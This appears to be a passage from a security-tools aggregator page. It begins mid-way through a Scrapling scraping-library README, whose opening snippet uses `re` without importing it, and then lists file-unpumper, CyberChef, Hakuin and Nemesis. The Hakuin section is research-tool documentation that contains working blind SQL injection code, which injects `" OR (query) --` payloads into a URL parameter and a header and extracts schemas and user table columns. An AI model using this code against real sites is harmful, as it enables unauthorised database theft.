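import xml.etree.ElementTree as ET

def find_all(root, *args, **kwargs):
    """Illustrative waterfall filter: tag names, then attributes, then regex, then functions."""
    tags, attrs, patterns, funcs = set(), {}, [], []
    for arg in args:  # Classify each positional argument by its type.
        if isinstance(arg, str):
            tags.add(arg)
        elif isinstance(arg, dict):
            attrs.update(arg)
        elif isinstance(arg, re.Pattern):
            patterns.append(arg)
        elif callable(arg):
            funcs.append(arg)
        else:  # Any other iterable is treated as a collection of tag names.
            tags.update(arg)
    # Keyword arguments are attributes; `class_` stands in for the reserved word `class`.
    attrs.update({name.rstrip("_"): value for name, value in kwargs.items()})

    def has_attr(el, name, value):
        found = el.get(name, "")
        return found == value or value in found.split()

    # Each stage only sees what survived the previous one; absent stages are skipped.
    results = list(root.iter())
    if tags:
        results = [el for el in results if el.tag in tags]
    if attrs:
        results = [el for el in results if all(has_attr(el, k, v) for k, v in attrs.items())]
    if patterns:
        results = [el for el in results if all(p.search(el.text or "") for p in patterns)]
    if funcs:
        results = [el for el in results if all(f(el) for f in funcs)]
    return results

doc = ET.fromstring(
    '<body>'
    '<div class="quote"><span class="text">Hello world</span></div>'
    '<div class="quote"><span class="text">Goodbye</span></div>'
    '<div class="footer">world</div>'
    '</body>'
)
print(len(find_all(doc, "div", class_="quote")))
print(len(find_all(doc, re.compile("world"), {"class": "text"})))
```

Because arguments are sorted into buckets by type before any filtering happens, the order you pass them in has no effect on the result.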

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> import re
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly:

>>> quote._root
<Element div at 0x107f98870>

  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods but you have to set the identifier by yourself.

  • To save an element to the database:

>>> element = page.find_by_text('Tipping the Velvet', first_match=True)
>>> page.save(element, 'my_special_element')

  • Later, when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this:

>>> element_dict = page.retrieve('my_special_element')
>>> page.relocate(element_dict, adaptor_type=True)
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.relocate(element_dict, adaptor_type=True).css('::text')
['Tipping the Velvet']

  • If you want to keep it as an lxml.etree object, leave out the adaptor_type argument:

>>> page.relocate(element_dict)
[<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find the first product with price '54.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as scrapy:

quote.re(r'regex_pattern')  # Get all strings (TextHandlers) that match the regex pattern
quote.re_first(r'regex_pattern')  # Get the first string (TextHandler) only
quote.json()  # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options

    except that you can do more with them, like:

quote.re(
    r'regex_pattern',
    replace_entities=True,  # Character entity references are replaced by their corresponding character
    clean_match=True,  # This will ignore all whitespaces and consecutive spaces while matching
    case_sensitive=False,  # Set the regex to ignore letters case while compiling it
)

    All of these methods belong to the TextHandler that holds the element's text content, so the same can be done directly if you call the .text property or an equivalent selector function.

  • Doing operations on the text content itself includes

  • Cleaning the text from any white spaces and replacing consecutive spaces with single space:

quote.clean()

  • You already know about the regex matching and the fast json parsing but did you know that all strings returned from the regex search are actually TextHandler objects too? So in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this:

page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()

  • Sort all characters in the string as if it were a list and return the new string:

quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.
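
To make the "sub-class of str" point concrete, here is a minimal sketch of how such a class can add helpers while staying a normal string. `MiniTextHandler` is a hypothetical name, not Scrapling's TextHandler, and it uses the standard `json` module where the text above mentions `orjson`.

```python
import json
import re


class MiniTextHandler(str):
    """Hypothetical str subclass; illustrates the idea, not Scrapling's TextHandler."""

    def clean(self):
        # Collapse every run of whitespace into a single space and trim the ends
        return MiniTextHandler(" ".join(self.split()))

    def re_first(self, pattern, default=None):
        # Return the first capture group (or the whole match) as the same type,
        # so further helper calls can be chained on the result
        match = re.search(pattern, self)
        if match is None:
            return default
        value = match.group(1) if match.groups() else match.group(0)
        return MiniTextHandler(value)

    def json(self):
        # Standard-library parser; assumed stand-in for a faster JSON library
        return json.loads(self)


script = MiniTextHandler('var dataLayer = {"page": "home", "items": 3};')
data = script.re_first(r"var dataLayer = (.+);").json()
print(data["items"])
print(MiniTextHandler("  a \n  b  ").clean())
print(script.upper().startswith("VAR"))  # plain str methods still work
```

Because `re_first` returns the subclass rather than a plain `str`, the regex-then-JSON chain fits on one line, as in the `dataLayer` example.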

  • Any element's attributes are not exactly a dictionary but a read-only sub-class of mapping called AttributesHandler, so it's faster. The string values returned are actually TextHandler objects, so all the operations above can be done on them, along with standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and can do partial searches. It might be handy in some cases (returns a generator of matches):

>>> for item in element.attrib.search_values('catalogue', partial=True):
...     print(item)
{'href': 'catalogue/tipping-the-velvet_999/index.html'}

  • Serialize the current attributes to JSON bytes:

>>> element.attrib.json_string
b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'

  • Converting it to a normal dictionary:

>>> dict(element.attrib)
{'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}
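
A read-only mapping with value search can be sketched in a few lines. The class below is a hypothetical illustration built on `collections.abc.Mapping`, not Scrapling's AttributesHandler; only the `search_values` name and its `partial` flag are taken from the example above.

```python
from collections.abc import Mapping
from types import MappingProxyType


class MiniAttributes(Mapping):
    """Hypothetical read-only attribute mapping (not Scrapling's AttributesHandler)."""

    def __init__(self, data):
        # MappingProxyType exposes a read-only view of a private copy
        self._data = MappingProxyType(dict(data))

    def __getitem__(self, key):
        return self._data[key]

    def __iter__(self):
        return iter(self._data)

    def __len__(self):
        return len(self._data)

    def search_values(self, keyword, partial=False):
        """Yield one-item dicts whose value equals (or contains) the keyword."""
        for key, value in self._data.items():
            if (keyword in value) if partial else (keyword == value):
                yield {key: value}


attrib = MiniAttributes({
    "href": "catalogue/tipping-the-velvet_999/index.html",
    "title": "Tipping the Velvet",
})
print(list(attrib.search_values("catalogue", partial=True)))
print(dict(attrib))
```

Since `Mapping` defines no `__setitem__`, an assignment such as `attrib["id"] = "x"` raises `TypeError`, which is what keeps the object read-only.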

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

Many details were skipped here to keep this as short as possible, so for a deep dive, head to the docs section. I will try to keep it as up to date as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚡ Enlightening Questions and FAQs

This section addresses common questions about Scrapling. Please read it before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together both are used to retrieve the element's unique properties from the database later.

  4. Later, when you enable the auto_match parameter for both the Adaptor instance and the method call, the element properties are retrieved and Scrapling loops over all elements in the page, compares each one's unique properties to the unique properties already saved for this element, and calculates a score for each one.
  5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now.
  6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.
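
The scoring idea in the steps above can be sketched with the standard library. This is a simplified illustration, not Scrapling's scoring code: the choice of `difflib.SequenceMatcher`, the four compared properties, and the plain average are all assumptions, and `similarity`, `score`, and `relocate` are hypothetical helper names.

```python
from difflib import SequenceMatcher


def similarity(a, b):
    """Ratio in [0, 1]; order-sensitive, so reordered class names score lower."""
    return SequenceMatcher(None, a, b).ratio()


def score(saved, candidate):
    """Average the similarity of a few properties (a simplified, assumed subset)."""
    parts = [
        similarity(saved["tag"], candidate["tag"]),
        similarity(saved["text"], candidate["text"]),
        similarity(saved["classes"], candidate["classes"]),  # lists of class names
        similarity(saved["path"], candidate["path"]),        # lists of tag names
    ]
    return sum(parts) / len(parts)


def relocate(saved, candidates):
    """Return every candidate that shares the highest score."""
    scored = [(score(saved, c), c) for c in candidates]
    best = max(s for s, _ in scored)
    return [c for s, c in scored if s == best]


saved = {"tag": "div", "text": "Tipping the Velvet",
         "classes": ["product", "featured"], "path": ["html", "body", "div"]}
redesigned = {"tag": "div", "text": "Tipping the Velvet",
              "classes": ["product-card", "featured"],
              "path": ["html", "body", "main", "div"]}
unrelated = {"tag": "a", "text": "Next page",
             "classes": ["pager"], "path": ["html", "body", "nav", "a"]}

print(relocate(saved, [unrelated, redesigned])[0]["text"])
print(similarity(["a", "b"], ["b", "a"]))  # below 1.0 because order matters
```

The redesigned element wins even though its class name and position changed, because the remaining properties still resemble the saved ones far more than any other candidate's do.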

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you later use the same identifier for a different website that you also initialized without the URL parameter. The save process will overwrite the previous data, and auto-matching uses only the latest saved properties.
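
The collision described here follows from how the storage key is formed. The sketch below is a hypothetical in-memory model, not Scrapling's database layer: `_DB`, `domain_key`, `save`, and `retrieve` are illustrative names, and using the URL's network location as the "domain" is an assumption.

```python
from urllib.parse import urlparse

_DB = {}  # shared table: (domain, identifier) -> saved properties


def domain_key(url=None):
    """Use the URL's host, or the word 'default' when no URL was given."""
    return urlparse(url).netloc if url else "default"


def save(identifier, properties, url=None):
    # Saving under an existing key overwrites the earlier entry
    _DB[(domain_key(url), identifier)] = properties


def retrieve(identifier, url=None):
    return _DB.get((domain_key(url), identifier))


save(".product", {"tag": "div"}, url="https://shop-a.example/items")
save(".product", {"tag": "li"}, url="https://shop-b.example/items")
# Two pages parsed without a URL share the 'default' slot and collide
save(".product", {"tag": "article"})
save(".product", {"tag": "section"})

print(retrieve(".product", url="https://shop-a.example/"))
print(retrieve(".product"))
```

With URLs, the same identifier is kept separately per site; without them, the second save replaces the first, so only the latest properties are available for matching.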

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract:

  • Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only).
  • Element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs say, but the auto-matching didn't return anything. What's wrong?

It could be one of these reasons:

  1. No data were saved/stored for this element before.
  2. The selector passed is not the one used while storing element data. The solution is simple:
    • Pass the old selector again as an identifier to the method called.
    • Retrieve the element with the retrieve method using the old selector as identifier, then save it again with the save method and the new selector as identifier.
    • Start using the identifier argument more often if you are planning to use every new selector from now on.
  3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its own state.

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from:

  • Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, the unique properties of the first element from the selection results are the only ones that get saved. So if the selector you are using selects different elements on the page that are in different locations, auto-matching will probably return to you the first element only when you relocate it later. This doesn't include combined CSS selectors (Using commas to combine more than one selector for example) as these selectors get separated and each selector gets executed alone.

Designed & crafted with ❤️ by Karim Shoair.



File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add

By: Unknown


file-unpumper is a powerful command-line utility designed to clean and analyze Portable Executable (PE) files. It provides a range of features to help developers and security professionals work with PE files more effectively.


Features

  • PE Header Fixing: file-unpumper can fix and align the PE headers of a given executable file. This is particularly useful for resolving issues caused by packers or obfuscators that modify the headers.

  • Resource Extraction: The tool can extract embedded resources from a PE file, such as icons, bitmaps, or other data resources. This can be helpful for reverse engineering or analyzing the contents of an executable.

  • Metadata Analysis: file-unpumper provides a comprehensive analysis of the PE file's metadata, including information about the machine architecture, number of sections, timestamp, subsystem, image base, and section details.

  • File Cleaning: The core functionality of file-unpumper is to remove any "pumped" or padded data from a PE file, resulting in a cleaned version of the executable. This can aid in malware analysis, reverse engineering, or simply reducing the file size.

  • Parallel Processing: To ensure efficient performance, file-unpumper leverages the power of parallel processing using the rayon crate, allowing it to handle large files with ease.

  • Progress Tracking: During the file cleaning process, a progress bar is displayed, providing a visual indication of the operation's progress and estimated time remaining.
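
The metadata fields named above (machine architecture, number of sections, timestamp) sit at fixed positions in the PE/COFF header. As a rough illustration, the Python sketch below reads them with the standard `struct` module. It is not file-unpumper's Rust code: `read_coff_header` and `MACHINE_NAMES` are hypothetical names, and the header bytes are synthetic so the example runs without a real executable.

```python
import struct
from datetime import datetime, timezone

MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0xAA64: "ARM64"}


def read_coff_header(data: bytes) -> dict:
    """Parse the DOS header pointer, PE signature, and start of the COFF header."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # e_lfanew at offset 0x3C points to the PE signature
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # Machine (2 bytes), NumberOfSections (2 bytes), TimeDateStamp (4 bytes)
    machine, n_sections, timestamp = struct.unpack_from("<HHI", data, pe_offset + 4)
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": n_sections,
        "timestamp": datetime.fromtimestamp(timestamp, tz=timezone.utc),
    }


# Build a tiny synthetic header so the sketch runs without a real executable
header = bytearray(0x80)
header[:2] = b"MZ"
struct.pack_into("<I", header, 0x3C, 0x40)
header[0x40:0x44] = b"PE\0\0"
struct.pack_into("<HHI", header, 0x44, 0x8664, 3, 0)
info = read_coff_header(bytes(header))
print(info["machine"], info["sections"], info["timestamp"].isoformat())
```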

Installation

file-unpumper is written in Rust and can be easily installed using the Cargo package manager:

cargo install file-unpumper

Usage

file-unpumper [OPTIONS] <INPUT>

  • <INPUT>: The path to the input PE file.

Options

  • --fix-headers: Fix and align the PE headers of the input file.
  • --extract-resources: Extract embedded resources from the input file.
  • --analyze-metadata: Analyze and display the PE file's metadata.
  • -h, --help: Print help information.
  • -V, --version: Print version information.

Examples

  1. Clean a PE file and remove any "pumped" data:

file-unpumper path/to/input.exe

  2. Fix the PE headers and analyze the metadata of a file:

file-unpumper --fix-headers --analyze-metadata path/to/input.exe

  3. Extract resources from a PE file:

file-unpumper --extract-resources path/to/input.exe

  4. Perform all available operations on a file:

file-unpumper --fix-headers --extract-resources --analyze-metadata path/to/input.exe

Contributing

Contributions to file-unpumper are welcome! If you encounter any issues or have suggestions for improvements, please open an issue or submit a pull request on the GitHub repository.

Changelog

The latest changelogs can be found in CHANGELOG.md

License

file-unpumper is released under the MIT License.



CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis

By: Unknown


CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.


Live demo

CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

A live demo can be found here - have fun!

Containers

If you would like to try out CyberChef locally you can either build it yourself:

docker build --tag cyberchef --ulimit nofile=10000 .
docker run -it -p 8080:80 cyberchef

Or you can use our image directly:

docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

This image is built and published through our GitHub Workflows

How it works

There are four main areas in CyberChef:

  1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
  2. The output box in the bottom right, where the outcome of your processing will be displayed.
  3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
  4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

You can use as many operations as you like in simple or complex ways.

Features

  • Drag and drop
    • Operations can be dragged in and out of the recipe list, or reorganised.
    • Files up to 2GB can be dragged over the input box to load them directly into the browser.
  • Auto Bake
    • Whenever you modify the input or the recipe, CyberChef will automatically "bake" for you and produce the output immediately.
    • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
  • Automated encoding detection
    • CyberChef uses a number of techniques to attempt to automatically detect which encodings have been applied to your data. If it finds a suitable operation that makes sense of your data, it displays the 'magic' icon in the Output field, which you can click to decode your data.
  • Breakpoints
    • You can set breakpoints on any operation in your recipe to pause execution before running it.
    • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
  • Save and load recipes
    • If you come up with an awesome recipe that you know you'll want to use again, just click "Save recipe" and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
    • You can also copy the URL, which includes your recipe and input, to easily share it with others.
  • Search
    • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
  • Highlighting
  • Save to file and load from file
    • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 2GB are supported (depending on your browser), however, some operations may take a very long time to run over this much data.
  • CyberChef is entirely client-side
    • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
    • Due to this feature, CyberChef can be downloaded and run locally. You can use the link in the top left corner of the app to download a full copy of CyberChef and drop it into a virtual machine, share it with other people, or host it in a closed network.

Deep linking

By manipulating CyberChef's URL hash, you can change the initial settings with which the page opens. The format is https://gchq.github.io/CyberChef/#recipe=Operation()&input=...

Supported arguments are recipe, input (encoded in Base64), and theme.
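
As an illustration of the format above, the following Python sketch assembles such a URL. `build_deep_link` is a hypothetical helper, `Operation()` is the placeholder from the format string rather than a real operation name, and the exact escaping CyberChef expects (for example whether Base64 padding should be percent-encoded or dropped) is an assumption to verify against the app.

```python
import base64
from typing import Optional
from urllib.parse import quote

BASE_URL = "https://gchq.github.io/CyberChef/"


def build_deep_link(recipe: str, input_text: str, theme: Optional[str] = None) -> str:
    """Build a URL hash with recipe, Base64-encoded input, and an optional theme."""
    encoded_input = base64.b64encode(input_text.encode("utf-8")).decode("ascii")
    parts = [
        # Keep the characters commonly seen in recipe strings unescaped
        "recipe=" + quote(recipe, safe="()',"),
        "input=" + quote(encoded_input, safe=""),
    ]
    if theme:
        parts.append("theme=" + quote(theme, safe=""))
    return BASE_URL + "#" + "&".join(parts)


url = build_deep_link("Operation()", "hello")
print(url)
```

Because everything lives after the `#`, the recipe and input stay in the browser and are not sent to the server as part of the request.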

Browser support

CyberChef is built to support

  • Google Chrome 50+
  • Mozilla Firefox 38+

Node.js support

CyberChef is built to fully support Node.js v16. For more information, see the "Node API" wiki page

Contributing

Contributing a new operation to CyberChef is super easy! The quickstart script will walk you through the process. If you can write basic JavaScript, you can write a CyberChef operation.

An installation walkthrough, how-to guides for adding new operations and themes, descriptions of the repository structure, available data types and coding conventions can all be found in the "Contributing" wiki page.

  • Push your changes to your fork.
  • Submit a pull request. If you are doing this for the first time, you will be prompted to sign the GCHQ Contributor Licence Agreement via the CLA assistant on the pull request. This will also ask whether you are happy for GCHQ to contact you about a token of thanks for your contribution, or about job opportunities at GCHQ.


Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:

  • BlackHat MEA, Riyadh, 2023
  • Hack in the Box, Phuket, 2023
  • IEEE S&P Workshop on Offensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
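import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # Inject the query into the vulnerable parameter
        url = f'http://vuln.com/?n=XXX" OR ({query}) --'
        async with aiohttp.ClientSession() as session:
            async with session.get(url) as r:
                # HTTP 200 means the injected query resolved to True
                return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
    async def request(self, ctx, query):
        # Inject the query into the vulnerable header
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                # The word 'found' in the body means the query resolved to True
                return 'found' in await r.text()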
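
Because the request method only reports True or False, a value has to be recovered one yes/no question at a time. The sketch below shows the underlying binary-search idea against a local stand-in oracle. It is not Hakuin's code and involves no network or SQL: `make_oracle` and `infer_char` are hypothetical names, and the 7-bit ASCII range is an assumption.

```python
def make_oracle(secret: str):
    """Simulate a True/False oracle locally (hypothetical; no network or SQL involved)."""
    calls = {"count": 0}

    def oracle(index: int, threshold: int) -> bool:
        # Answers: "is the code point of secret[index] greater than threshold?"
        calls["count"] += 1
        return ord(secret[index]) > threshold

    return oracle, calls


def infer_char(oracle, index: int, low: int = 0, high: int = 127) -> str:
    """Recover one ASCII character by halving the candidate range each question."""
    while low < high:
        mid = (low + high) // 2
        if oracle(index, mid):
            low = mid + 1   # the character is above the midpoint
        else:
            high = mid      # the character is at or below the midpoint
    return chr(low)


oracle, calls = make_oracle("admin")
recovered = "".join(infer_char(oracle, i) for i in range(5))
print(recovered, calls["count"])
```

Each character costs seven questions here (the range of 128 values is halved seven times), which is the baseline that smarter guessing strategies try to beat.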

To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms:      Use this DBMS
    # n_tasks:   Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.run(main())

Now that everything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}


Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R


Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

Post Name | Publication Date | Link
